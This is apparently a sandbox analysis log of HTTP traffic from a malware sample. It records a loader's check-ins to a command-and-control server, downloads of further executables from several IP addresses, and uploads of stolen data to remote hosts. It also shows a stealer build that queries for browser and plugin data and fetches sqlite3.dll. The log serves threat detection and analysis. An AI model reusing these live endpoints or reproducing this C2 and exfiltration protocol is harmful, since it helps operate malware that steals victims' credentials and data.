Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 24 Nov 2024 11:26:11 GMTContent-Type: application/octet-streamContent-Length: 2781696Last-Modified: Sun, 24 Nov 2024 10:26:38 GMTConnection: keep-aliveETag: "6742ff5e-2a7200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2b 00 00 04 00 00 83 ec 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 79 66 69 61 72 76 72 65 00 20 2a 00 00 a0 00 00 00 12 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 63 63 6b 69 78 6e 6c 00 20 00 00 00 c0 2a 00 00 04 00 00 00 4c 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 2a 00 00 22 00 00 00 50 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 37 33 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008733001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: global traffic HTTP traffic detected: GET /files/6856384433/fMb18eF.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 37 33 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008738001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/6856384433/QwGWuQZ.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 37 34 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008743001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 463Content-Type: multipart/form-data; boundary=------------------------on2cWYroZkKh7pQtjtukLqData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6f 6e 32 63 57 59 72 6f 5a 6b 4b 68 37 70 51 74 6a 74 75 6b 4c 71 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4c 69 77 75 6d 75 71 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a a1 25 6a 0a 09 b1 2a 43 4e 74 54 88 d1 b0 97 a9 c7 90 50 16 6f b0 e1 e3 ea 6e 18 2e 2e af c5 f7 c7 cd 59 03 3e ee dc 76 8d a3 3c e4 e5 76 46 4d ff 4c f7 d9 3c a5 b4 c5 52 45 b4 b0 ea 7b 46 23 cf 2b 80 d6 77 b6 25 a9 bb 8f 9f d2 88 ac 3c 56 46 62 6a a9 9a b3 b6 fb 54 e4 60 d0 4e be 74 d7 c8 46 a4 01 e5 21 ea 78 53 ca 63 ac 5e b4 01 36 62 a6 71 49 1e 7e f2 b6 0a 1e ad 22 84 ac 13 ef 00 87 ec 7e 84 67 2a 93 48 a5 05 0b 24 19 05 2c b8 b0 0d 7b c0 5f a4 64 2a 0b d3 6f 47 bf 28 49 4e c7 f5 0a 76 18 35 18 d0 5d 26 57 60 54 a5 1a 8d 35 3a 22 f8 85 3c c6 04 3e 68 65 a3 72 7a 2a 30 80 8e e2 c1 41 5e 4a a7 34 8f c7 75 5d 28 65 0f 92 67 51 d1 d1 7a b6 74 f6 20 f3 1f e8 8e 23 0c 71 6b 51 0d 16 99 b6 27 9b df c4 8c 5a 7a f7 53 b9 44 20 b1 58 1d 66 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6f 6e 32 63 57 59 72 6f 5a 6b 4b 68 37 70 51 74 6a 74 75 6b 4c 71 2d 2d 0d 0a Data Ascii: --------------------------on2cWYroZkKh7pQtjtukLqContent-Disposition: form-data; name="file"; filename="Liwumuq.bin"Content-Type: application/octet-stream%j*CNtTPon..Y>v<vFML<RE{F#+w%<VFbjT`NtF!xSc^6bqI~"~g*H$,{_d*oG(INv5]&W`T5:"<>herz*0A^J4u](egQzt #qkQ'ZzSD Xf--------------------------on2cWYroZkKh7pQtjtukLq--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 37 34 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008744001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 90210Content-Type: multipart/form-data; boundary=------------------------cgahQLERDJggL8bbVBraLpData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 63 67 61 68 51 4c 45 52 44 4a 67 67 4c 38 62 62 56 42 72 61 4c 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 59 61 6e 61 64 6f 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ad 70 8a fc cc 06 90 ca ea a8 3a 24 c5 f7 8b 8c 4d d2 42 3d 24 d6 fb 62 05 41 91 82 a9 e6 04 79 24 d4 61 a5 34 fd 8c ff 66 20 d6 eb 14 22 7e 6b ac d5 61 b3 b6 e5 8c f7 91 17 6c d5 17 39 d4 1f a6 fe 93 ea 16 1b 57 8b e6 03 c8 6a a9 2e e6 5b a1 39 30 88 38 dc 77 3e 7d 3c 6a 66 c1 f1 1a 7d 3e 76 59 4b b1 67 8c 78 a2 43 cf 08 d0 26 bd eb c6 a4 d9 0a b1 a2 5f bb ea 8f e4 6f d6 99 fa 1f d0 7a 50 a5 39 82 94 62 14 da e9 6b 95 a5 cc cb c3 63 47 ee 7d 4a af aa f0 2b 53 08 ce 79 38 18 8a 7b f0 8f 6c 3a 51 64 39 5b 76 78 40 9c 3a 40 ce f9 63 2f 42 04 01 8a be 2f fb 00 db 33 03 64 80 ce 1b 85 92 d3 da 2d 88 01 4d 16 aa d6 2c 78 8e 7e 90 7c 80 85 b0 7f f8 00 c9 d7 85 b0 87 45 fd 8f 9a fe 48 46 bf 35 fe 64 c0 de 7a fc a9 ea f3 f2 52 75 6d 87 38 81 4a 6e f7 82 3b ef ef 8a c1 1f fe 2b 51 cc 89 4a 31 d2 f3 4e b8 53 19 ec 83 75 2d 5f ca 73 cb 80 ec 84 e2 3f d7 3c 85 f0 85 fe 9a be a6 ba 1f 76 d5 1d 81 6a f9 09 e1 7d fa 57 2a 60 0e 53 ed 77 ae 3f 0f c4 de 0c 83 08 78 dc 66 55 11 c5 e2 e9 7a 0e f6 c8 cb 4d 9f 47 06 8b 03 b1 9c 6c 00 c3 ac a6 f3 a1 23 48 e8 11 70 71 10 b0 e9 ee 06 87 bf 9d 1b 27 21 f3 f1 a7 e2 84 4b 9e 3b 1f 08 61 3a 68 5b c4 f3 aa c0 f4 81 30 de cb 0a 21 92 5b 3a 4c 5c 93 1c e2 1e 89 b1 cb d6 e2 9e eb cc 8c 99 be 7a 28 ca 5c 29 fb 3f c8 81 3c 2e 5c 38 01 ba 49 90 9e db c7 0f 33 73 ac d4 3c 5e 1b c7 7d d3 b6 25 2d c2 55 cd b1 17 1e 14 19 32 e0 49 72 c2 23 71 d4 85 90 fd 17 a3 25 3e 9f 08 5b 95 e2 33 e1 91 d8 93 85 bc 63 9f 3a 41 27 93 3b f8 4c 9f 9c c2 5e c0 a2 a9 38 17 39 4b 17 09 b1 c6 cb e7 2e 8b 23 ac 8b 5a 9e 0d c3 32 b6 b1 79 2a 07 53 1d 96 e8 ea af 5d 35 30 59 99 ad 97 c0 ca 34 7b b1 d0 f9 1a e7 cc a8 35 b6 91 92 a7 ea db 5e b3 a4 57 92 c7 6a 5b 19 6c 46 66 e8 e7 7d 0f ea 8c 77 28 66 02 99 92 b8 ef 7c 82 89 b7 b6 95 27 bc de 3c 56 de dc 1a 6f c9 90 19 4b 5e 9f 7f 66 e3 2f a3 6e 0d 7c 9d d2 58 b6 33 3a d7 92 ab 7d 09 47 56 7b ae fa bb 13 93 4e c5 0b f0 ce 13 49 66 59 af f8 7c d6 5a 42 55 ca d5 7e 12 fc 77 09 1d 35 83 c7 fb 5d fb c2 6c 59 bd 0b 29 4f be 70 f6 74 ba bd 35 25 10 54 ea 9b 8f c4 63 44 be 56 3e 44 08 48 9a 63 45 0a da 82 18 d8 01 5c d4 48 ea b6 ae 57 b9 28 38 5c 43 ac 1f d2 4a ac e3 88 03 1e c3 76 69 f4 ec 68 dc c9 4c 13 fa c2 73 1f b3 bb 21 6d 83 0b c7 78 b4 3e f5 61 dc a0 a7 08 02 f3 e6 50 03 a8 69 e1 98 d7 4c 25 19 e1 51 b3 65 fb 74 8a 59 fb e3 fd 25 60 28 dc bc dc 76 6c 43
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 37 34 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008745001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 37 34 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008746001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 25623Content-Type: multipart/form-data; boundary=------------------------VMuI6VVGrpsk2S7B8E2jKmData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 56 4d 75 49 36 56 56 47 72 70 73 6b 32 53 37 42 38 45 32 6a 4b 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 46 6f 6a 69 71 61 78 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 1f 60 a9 72 a3 17 53 96 9a 99 45 28 db 54 24 51 2c 59 14 71 c6 1c 0e b7 ce 12 24 c2 70 9d 66 24 fd 24 73 fa 85 84 0c ca 1a 35 90 7d 79 a0 36 dc b1 19 b5 7f 9b 7c 7d d4 f4 9f b4 b3 a5 f8 ec 93 67 9c 0d d6 f8 a1 79 b3 f7 45 e9 3f 3e 41 d6 b8 b4 5f 28 6b af ed f1 77 1e 99 70 a0 01 fa de 09 7a b5 20 61 97 76 f9 75 e4 5c e0 1c d5 ad 2b d6 42 95 70 f1 3d 36 e0 56 5a 2f c9 58 4c 45 51 9a 66 99 e0 0a 0e a8 58 22 e2 48 e2 d3 65 45 74 b4 bb fb ab 8a ce 5e a4 f3 06 af 93 11 bb 9c 00 eb ba 60 46 77 aa df f0 bf 66 70 ee 75 57 55 a8 54 5a dd 25 d2 15 5c 26 55 42 f4 03 1a 83 49 36 3a fa d8 e0 a3 91 54 30 51 25 3c e8 b2 54 69 39 e6 9f 23 b8 e8 d1 25 73 56 a9 34 76 3c 46 39 f7 98 65 3f 51 9b ed 52 5e 9c 9f 83 dd 35 ef 43 1e 04 5a ee b6 03 2c a2 5c de a6 3c 19 f9 ed 5e ba 86 d0 f8 fd d5 7b e0 79 5c 92 be 0e c6 64 f4 33 70 9d a1 4d 04 e3 3a 87 95 60 15 de 7a 77 0c 55 85 f6 91 c8 b0 42 1f c3 a7 76 49 85 9d 24 d2 cf c4 41 7a 75 08 95 a2 75 1c 95 49 24 bd 05 a1 a3 37 da 6c fa 36 b0 49 0e 23 95 b5 a9 59 4e ff 1d 0d 9c db 50 66 52 d4 c8 a6 7d 80 5e c4 47 63 3b f8 21 8f 4e b6 a5 5e 2d 76 f3 62 cc a1 0d 9a 9d 0e 39 90 d7 90 5a 48 39 61 2d dd 18 db 47 07 2e 3b be c2 c0 21 2e ca 1a ea 78 67 9b 25 94 2d 40 88 7b 09 db 89 69 0c 48 76 40 f2 60 46 26 13 23 2c 76 91 0f 47 9e 28 ea 7c 1a 59 75 79 43 28 dd 21 a9 e1 e9 a4 b7 86 82 5b 0d a9 fa a6 a2 b0 7a 30 d3 e3 44 06 32 c5 50 e9 19 55 65 ea 68 61 18 b7 9a ef 7d 8c ef 91 82 83 ae 58 7a ef 60 d0 b1 9d b6 f0 f3 76 15 6a 9a a9 2e 49 14 e6 e3 8b 86 35 10 ed 7a da ed 0b 32 79 74 7a ff 6a 05 24 60 d5 56 fa 87 35 56 5c 59 d1 a7 05 c4 a0 f8 e1 05 c2 e8 06 ed 93 b1 1e 24 f3 89 10 b2 02 d6 03 67 3a 20 2b 6d ce 28 14 e3 d9 45 73 23 b5 29 93 5e 83 20 de 66 12 5a 6d bb 7e 10 9c d7 05 17 28 4f cb e6 f3 cd 28 a7 17 41 cc 65 25 02 d6 d1 fa 22 bd 9c c9 71 9c b4 c8 01 86 56 09 3e af 69 d7 6c f4 2c 16 54 73 57 16 c6 86 1f e3 7b 13 ee fb 5f f6 1a 6c 42 ab 95 7d 96 3b fb e1 90 1d d8 c7 b5 e1 de c0 de 25 47 bf 1a 09 81 ff 40 ee 40 16 62 13 0d 9b f9 e4 5a c3 51 5d 96 61 d0 bb f8 d9 04 d5 99 9a b7 60 bf 6b ed 2d de e9 cc 92 5d 87 1f 98 90 61 08 2d db d5 f7 55 11 15 27 68 87 a9 91 84 b8 d3 ad 5b 65 f8 11 fa 4f e5 b2 c4 b9 41 d9 ac 6d 2d f6 58 e9 87 5a 72 40 1e 83 c8 a4 77 22 82 d0 da e7 c1 62 d8 17 10 01 58 8f c0 67 eb 86 36 9e 43 33 8c 68 8d 2a 94 d9 bb e1 72 7b 94 b0 73 21 33 1a c2 77 dd 94 bb
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECBAFCAAKJDHJKFIEBGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 41 30 45 31 33 38 36 42 33 37 31 33 36 30 34 32 39 36 32 39 37 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 2d 2d 0d 0a Data Ascii: ------IECBAFCAAKJDHJKFIEBGContent-Disposition: form-data; name="hwid"3A0E1386B3713604296297------IECBAFCAAKJDHJKFIEBGContent-Disposition: form-data; name="build"mars------IECBAFCAAKJDHJKFIEBG--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBGHDGHCGHCAAKFIIECFHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 30 66 61 37 34 65 36 63 63 38 30 35 33 33 61 63 63 39 38 36 33 36 64 65 62 64 33 37 38 30 61 36 34 61 30 64 34 31 39 61 30 35 66 62 39 62 34 38 32 36 37 34 63 61 64 62 65 34 35 65 30 38 34 34 39 64 35 39 39 35 34 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 2d 2d 0d 0a Data Ascii: ------DBGHDGHCGHCAAKFIIECFContent-Disposition: form-data; name="token"30fa74e6cc80533acc98636debd3780a64a0d419a05fb9b482674cadbe45e08449d59954------DBGHDGHCGHCAAKFIIECFContent-Disposition: form-data; name="message"browsers------DBGHDGHCGHCAAKFIIECF--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECFHCGHJDBFIIDGDHIJDHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 30 66 61 37 34 65 36 63 63 38 30 35 33 33 61 63 63 39 38 36 33 36 64 65 62 64 33 37 38 30 61 36 34 61 30 64 34 31 39 61 30 35 66 62 39 62 34 38 32 36 37 34 63 61 64 62 65 34 35 65 30 38 34 34 39 64 35 39 39 35 34 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 2d 2d 0d 0a Data Ascii: ------ECFHCGHJDBFIIDGDHIJDContent-Disposition: form-data; name="token"30fa74e6cc80533acc98636debd3780a64a0d419a05fb9b482674cadbe45e08449d59954------ECFHCGHJDBFIIDGDHIJDContent-Disposition: form-data; name="message"plugins------ECFHCGHJDBFIIDGDHIJD--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCFHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 30 66 61 37 34 65 36 63 63 38 30 35 33 33 61 63 63 39 38 36 33 36 64 65 62 64 33 37 38 30 61 36 34 61 30 64 34 31 39 61 30 35 66 62 39 62 34 38 32 36 37 34 63 61 64 62 65 34 35 65 30 38 34 34 39 64 35 39 39 35 34 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 2d 2d 0d 0a Data Ascii: ------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="token"30fa74e6cc80533acc98636debd3780a64a0d419a05fb9b482674cadbe45e08449d59954------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="message"fplugins------CGHCGIIDGDAKFIEBKFCF--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 37 34 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008747001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIJEGCBGIDGHIDHDGCBHost: 185.215.113.206Content-Length: 7511Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
